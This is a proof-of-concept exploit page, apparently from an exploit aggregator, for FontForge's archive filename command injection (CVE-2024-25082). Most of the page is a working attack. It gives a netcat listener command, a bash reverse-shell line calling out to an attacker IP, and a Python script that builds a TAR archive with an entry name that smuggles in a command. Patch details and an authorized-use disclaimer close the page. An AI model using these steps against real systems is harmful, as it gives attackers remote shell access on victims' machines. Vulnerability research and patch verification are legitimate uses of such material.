Share
## https://sploitus.com/exploit?id=1134A0B1-631D-58C1-8B67-4C5C5AC1661E
# โš ๏ธ FontForge RCE โ€” CVE-2024-25081 & CVE-2024-25082 - PoC

## ๐Ÿ“– Overview

Proof-of-concept exploit for two command injection vulnerabilities in **FontForge โ‰ค 20230101** (`Splinefont` component).

| CVE | Vector | Trigger |
|---|---|---|
| CVE-2024-25081 | Crafted filename | Direct file open |
| CVE-2024-25082 | Crafted archive filename | TAR/ZIP/GZ/BZ2 extraction |

This PoC targets **CVE-2024-25082** โ€” FontForge's automatic archive extraction passes filenames to a shell without sanitization, allowing a semicolon-delimited payload embedded in a TAR entry name to execute arbitrary commands.

---

## How It Works

FontForge supports opening font files directly from archives. When extracting a TAR archive, the `Splinefont` component constructs a shell command using the filename from the archive entry. Because the filename is **not sanitized**, a semicolon (`;`) in the entry name breaks out of the expected command and injects arbitrary shell instructions.

**Malicious TAR entry name:**
```
exploit.ttf;bash /tmp/s.sh;
```

When FontForge processes this archive, the shell interprets this as:
```
 exploit.ttf ; bash /tmp/s.sh ; 
```

---

## Environment

- **Vulnerable software:** FontForge โ‰ค 20230101
- **Platform:** Linux
- **Attacker listener:** `192.168.1.20:4444` (adjust as needed)

---

## ๐Ÿ“‹ Prerequisites

- Python 3 (standard library only, `tarfile` module)
- `netcat` on attacker machine
- FontForge โ‰ค 20230101 on target machine

---

## ๐Ÿ› ๏ธ Proof of Concept

### 1. Start a netcat listener on your attacker machine
```bash
nc -lvnp 4444
```

### 2. Generate the malicious TAR archive
```bash
# Write the reverse shell payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Build the malicious archive
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF
```

### 3. Open the archive in FontForge on the target
```bash
fontforge exploit.tar
```

A reverse shell will connect back to your listener.

---

## ๐Ÿ”’ Patch

Fixed in FontForge post-20230101 via [PR #5367](https://github.com/fontforge/fontforge/pull/5367). Upgrade to the latest release.

- **Debian/Ubuntu:** `sudo apt upgrade fontforge`
- **Manual build:** pull latest from [fontforge/fontforge](https://github.com/fontforge/fontforge)

---

## ๐Ÿ” Reference

- [NVD โ€” CVE-2024-25081](https://nvd.nist.gov/vuln/detail/CVE-2024-25081)
- [NVD โ€” CVE-2024-25082](https://nvd.nist.gov/vuln/detail/CVE-2024-25082)
- [FontForge fix PR #5367](https://github.com/fontforge/fontforge/pull/5367)

---

## โš–๏ธ Disclaimer and Terms

This Proof of Concept (PoC) code is provided for **educational and authorized penetration testing purposes only**.

- **No permission** is granted to modify, redistribute, or use this code for any other purposes.
- Unauthorized use or modification may be **illegal and unethical**.
- The authors take **no responsibility** for any misuse or damages.